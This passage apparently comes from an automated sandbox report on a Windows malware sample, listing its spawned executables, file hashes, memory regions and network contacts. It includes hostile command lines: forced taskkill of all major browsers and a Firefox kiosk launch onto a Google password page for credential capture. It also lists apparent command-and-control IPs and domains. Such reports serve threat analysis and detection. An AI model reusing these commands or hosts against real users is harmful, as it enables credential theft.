PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe

"C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe

"C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe"

C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe

"C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 800 -ip 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 800 -ip 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 1484

C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe

"C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe"

C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe

"C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cabc9487-8b5d-45e6-ac4b-693bd0145402} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9549b08-465c-4989-97de-6afc9b6fcc22} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" socket

C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe

"C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3332 -childID 1 -isForBrowser -prefsHandle 3408 -prefMapHandle 2996 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5d894d6-17cb-408f-a00b-3179494157df} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3672 -childID 2 -isForBrowser -prefsHandle 3664 -prefMapHandle 2932 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {054b2b8a-f6cb-494e-96a8-08f7afa02a8c} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4444 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4504 -prefMapHandle 4488 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72094ee3-57e5-4174-bc6c-3756134f6a5f} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -childID 3 -isForBrowser -prefsHandle 5424 -prefMapHandle 5528 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb202526-e1c4-44bf-bd52-0d0385dfca62} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 4 -isForBrowser -prefsHandle 5736 -prefMapHandle 5600 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc643c2e-4d7a-4b2e-9083-375d0259b722} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5912 -childID 5 -isForBrowser -prefsHandle 5992 -prefMapHandle 5988 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb7b6797-067d-4573-97ff-85b1ab145cea} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 atten-supporse.biz udp
NL 92.63.197.221:80 tcp
US 104.21.16.9:443 atten-supporse.biz tcp
US 8.8.8.8:53 se-blurry.biz udp
US 172.67.162.65:443 se-blurry.biz tcp
US 8.8.8.8:53 9.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 104.21.62.142:443 zinc-sneark.biz tcp
US 8.8.8.8:53 65.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 142.62.21.104.in-addr.arpa udp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
N/A 127.0.0.1:53209 tcp
US 8.8.8.8:53 youtube.com udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 www.youtube.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 142.250.178.14:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.178.14:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
GB 142.250.200.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
GB 142.250.200.14:443 consent.youtube.com udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 1.97.149.34.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 164.237.32.52.in-addr.arpa udp
N/A 127.0.0.1:53216 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 169.175.125.74.in-addr.arpa udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
NL 92.63.197.221:80 tcp
NL 92.63.197.221:80 tcp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
NL 92.63.197.221:80 tcp

Files

memory/1388-0-0x0000000000270000-0x0000000000715000-memory.dmp

memory/1388-1-0x0000000077D44000-0x0000000077D46000-memory.dmp

memory/1388-2-0x0000000000271000-0x000000000029F000-memory.dmp

memory/1388-3-0x0000000000270000-0x0000000000715000-memory.dmp

memory/1388-4-0x0000000000270000-0x0000000000715000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 1f6294fca2fa8c5e80eafb976f65aa60
SHA1 d0d52c6af42cebe1dc967635d1d4f9d2a2a40ebd
SHA256 f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813
SHA512 aef446a9e5656bb820e8086e053972e70d4f2a315918d0c298def9610c1376c9575b91a7c3f4c1677788f8edb88d0acdffa854f417e03c63f0be90995d1c3257

memory/4396-18-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1388-17-0x0000000000270000-0x0000000000715000-memory.dmp

memory/4396-19-0x00000000005F1000-0x000000000061F000-memory.dmp

memory/4396-20-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/4396-21-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/4396-22-0x00000000005F0000-0x0000000000A95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe

MD5 c9420e178724864d8be4caa3e0600b89
SHA1 0a50a13ada835b4f831a4e47d08a9672efe13bfa
SHA256 8d74dff63ca291a7a5457b6924722959319ff92d8130954bfd8a816d117e6160
SHA512 734081b83a3213906960d9bcd6573218a22721005d7d7e1250f34de2485c49db17a9f27f34f4da33afc6c2db1ebe9be299ce4ba31a6ec20d2a78ec91dda57947

memory/1744-41-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-42-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-43-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/1744-44-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-45-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-47-0x0000000000400000-0x0000000000C7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe

MD5 4fad8d319caf757925298077224994c6
SHA1 7b9a56f22cb27e335bbcf79c1b87607ee0725f47
SHA256 7f6f12ac7230f88338f2fee645f83f064ec05b76b2900c4267189b06efccda62
SHA512 853640c1bd66ad10516551e5696e44b9099d4aa353231ffb6b45c5067ef261c63481d2cce322f536b6a2ecb1c4c0f5f0cfb61d99c8f1a1d607aacd56f2efe4a2

memory/4396-62-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/800-64-0x0000000000EF0000-0x0000000001382000-memory.dmp

memory/1744-65-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/1744-66-0x0000000000400000-0x0000000000C7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe

MD5 0725f1cbe54d3f3523d950c2bfda2331
SHA1 1955f4ed8036db33f8c556f66e3789466957be8d
SHA256 dd6bbafdd895585e82f07b0cb50e2cfc41e57d21060b80098e1018a2729db975
SHA512 26c750d5e6932d26a73450771e02f70d36f318e9b1a930a69a57e13b6fdd7f5c1deb91b998ccb2c356f271de2dab789fb1c720c1f0747ff40aa7c894be00a9a9

memory/4312-82-0x0000000000630000-0x0000000000B1A000-memory.dmp

memory/800-84-0x0000000000EF0000-0x0000000001382000-memory.dmp

memory/1744-85-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4312-87-0x0000000000630000-0x0000000000B1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe

MD5 6b34ffe574e9fe52d4d2726e06dc9724
SHA1 fd838c42cc6d55864901f548d98abc4f019b895f
SHA256 7ffa2a7712d48443a2ab520d3536f62b06b04cffdc6ecdc609372a57fa526fb4
SHA512 4ac5936cdeb598963f02b4828333fbf4c41e50bb738709d1e91ba574c23fda5a6de9ffc993117dd85a3b54a3f287a17e50b27f14f84f32e11fc2f37395093ee4

memory/4396-106-0x00000000005F0000-0x0000000000A95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe

MD5 2d4351ba2544c52f579a5af3259a4d70
SHA1 c48b260375c09c4d0f6c0301d0baaab3e6330636
SHA256 937f684a9b33782223e4a7c2af7009173fa4fccc21803bbb6c9affa5e38f70dc
SHA512 b90f6be16558e2356b597978c57eecc294d3559a3e0a1719f3468f22f6f0d23ab30358d67792afbc0917733730ecda22ea0728793db9576ac0cdc4cb4940b2f5

memory/3636-132-0x0000000000AA0000-0x0000000000D58000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\ac9098fb-52a8-45ce-9a39-23a592421c4a

MD5 89d3d3b70a1b7c1044dc3d5326322627
SHA1 6ce52204b373693ededbc54b69c496a6633c08c6
SHA256 565d031f5523b10c487aee1f3b0af212427d18ba47253fe5c9bd30865da2478e
SHA512 08385e125e2c9148fd62d3cf256886beedc2922f9a9d5be9d10200c9a0551a76ba4fd36658c2f929b03662cef0b6f24eba81535a3e318e163a39530959f54e8f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\acdf9558-892f-4b47-920d-732819f387fc

MD5 03025ccb058c478b92b4d84c8098e571
SHA1 42be0d3c205ef8519fa8388406f8fc169371d327
SHA256 b4f76ce29d3a700973ccc1b59bc3f25669bcf51d136c54edbe9e52163cb826c4
SHA512 f6a3c7663774ad0644332c950769a752f04c60ba80f580dc69287104ba579e60b269f49d50e61759f80768ecb2e0ef01a416d89e7f6294a06e919736af79276c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\918067d9-73d6-4414-9267-4aef2ef614ab

MD5 54895f61a05ab7abe9d628b44248dbcb
SHA1 419ff381ec3f4d307ab2ad6d8c19437f973d98d7
SHA256 7227a67be28b1a10e395332b3f7a1ee9a0938ef48e0debb3179e1cb4135f2703
SHA512 594c252c193918b02e4417f0535a4b0cc89bdb168aad22568c3fc07400bff20a7d664321758f8e4f62f1cc59d4048a1ad9480956f9b4551e96b0bbbd83a93ff5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp

MD5 f8fbac041f44c224038f33d7c00d3d2f
SHA1 874e64e4985b9e11c8e00ce73c7e0cac9c47eae8
SHA256 4a35c9b2e6c54c55c44d80743377fdb27f06aa62488f3a88a48d3f9e7dfc152d
SHA512 abd3835822ef486d97f56f338099b233eec974e5ee7b8f678d7159e9c52352a6144bff74755c7e37b9d5f77b94e697c3db61a019cbf035dead56c8c49c40237e

memory/3636-368-0x0000000000AA0000-0x0000000000D58000-memory.dmp

memory/3636-367-0x0000000000AA0000-0x0000000000D58000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\activity-stream.discovery_stream.json

MD5 0808f42295d9a09f4e60b0c20d872c6b
SHA1 b31261446c42c234f18864429c0fdf9417c38c1c
SHA256 99dd8965c7aa7872d3ee5347e652abe948b15e2f1f08ea3baeac9c798bef07da
SHA512 48a5f7364256a043ec1da694213d527341c86cb850c912aabb981c9c35172e1451ccca679d0ba336ab7b40e6ad10fc3535e763713846916dbc030e00b0766736

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin

MD5 0cfb8f4968dfd8c411a71db468dc8bf5
SHA1 b05177cbb8612b837bba4dd0fe9cda993f2748fa
SHA256 d40c89f3c6a90f9fac6e5640b6758d3ebb97f70983eb3ca44cac191356b68675
SHA512 8a25888a9d2973ed4cec7f13550749a3897705aedddbd8ccec52348fd5d85a05c1b0c38f5bce91e627fed4b1ac8cd77c68607439f98c256bcbc7f8f633858150

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp

MD5 e3cde059837457f4fc49912e6520dd99
SHA1 308cb44a12f7c3dbdfce3b1938ece00df5c228bd
SHA256 7bf19c919c7090ee345540559b28926fc2115e17ced4b3f4a36e6dcc9081e08b
SHA512 5863894d5057a42106e8d2416f36914085d27658f001881834c1579ae50504bf17c226dd6ecabf5bd8cbc6253d0a7f4a7442fba92b6172ad0f8c9f714ee433f0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs.js

MD5 f29f3418132dbaaeda98752647bd29cd
SHA1 997a42bac1c0cce1cf4473a3d2492984f50d7a19
SHA256 1349bfd723d9a88dd0081222ea4849423b25ea8751cccba40d49083c4f1b85c7
SHA512 0d6fd231f95d607110c0c1fe98ea03ffe3a48c3c650dc00840d586bf20274861517eb55a2216ebe4dec1f6ac7b45fc59226067983d16d478ee11ec26a0fc682c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs.js

MD5 dae539705fb9900e13551b3b6621487f
SHA1 fbec8e4e31d4eb0433421a55182c0d159669737e
SHA256 20514cc26b13bd18c30291f6fc3cd63a50fbd62c43b1e98c06191cc5425edf96
SHA512 ff980f50e29f88a7ac03b403fc441280ad314491c5afe935a0c58301535de83be4f083c9a323e5b650a25a8581c0d56cdca371f82e435cbe289209ef8c722622

memory/1744-498-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-510-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/3636-512-0x0000000000AA0000-0x0000000000D58000-memory.dmp

memory/3636-521-0x0000000000AA0000-0x0000000000D58000-memory.dmp

memory/6080-523-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/6080-524-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-525-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-526-0x00000000005F0000-0x0000000000A95000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp

MD5 2c9219d53d8acc2f501bd1c34bdeb31c
SHA1 0ecde0b9c1e09457ca0cbdf8318dda531500f035
SHA256 fb45abf3434d74ccfe45f00534888a97b61cf9f9ff8b9ba0005726cbc4be73ec
SHA512 b65a59a9f1562d8b8b9a2f16e576c52672fb9a4ef11ef712910a77f9049f94d4cccc5a612f95f5b0bd0de5553a0442ac408d013bb2cf8af64d1033d488bbe762

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

MD5 bcaecc133b0e4a4a837185f0ca8d0250
SHA1 ce18f5bd331e6fdfa697ff881763e2298fd6716a
SHA256 3c9da8a2bfe377813f00dac7a4eee60f71fd697124d5c00d22a0346f9fb2892c
SHA512 e6c798e439956a535cfca82311002e5473f11a3b7dc18034c156936ecde2f62bf027f837d15b563d6ed71443b55c12618f6dfc1f543608e4efa63a919c6c0edc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs.js

MD5 8b158c32c6bdf42169e8d7b2e1bd6e90
SHA1 c2c1546a61f07f6a2a98232f25f9a61b04e70a43
SHA256 b7b7f308f998bf149f68e651671b5c4ceb2d3a01da9dc18d62e597d26fd4a346
SHA512 57acfbddfcb6f36f95c88a601db0aeaed8016cacebd9566415eeb68efd4bb3dd7133585f410b6d0f2bc7d29fadaec496d8496b560f8589b3a239f1be4f6bec31

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs-1.js

MD5 79ededc48feaf16c3fd6396a98843188
SHA1 a833588b65ab54435c14cfeb967028c3ec39092a
SHA256 a6330908a2e67328f995be1f5398a5be93983d316264d3ad5153cc4f883d6067
SHA512 513d6aa5fdf912e3fa9066023d0dc26fd3add93fcfc88d3499b1ddf379d50f213ef65ff8e26ff0fdfd706e94079d547c0fd5d50b62ad9f1905d55afffac2e329

memory/1744-701-0x0000000000400000-0x0000000000C7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

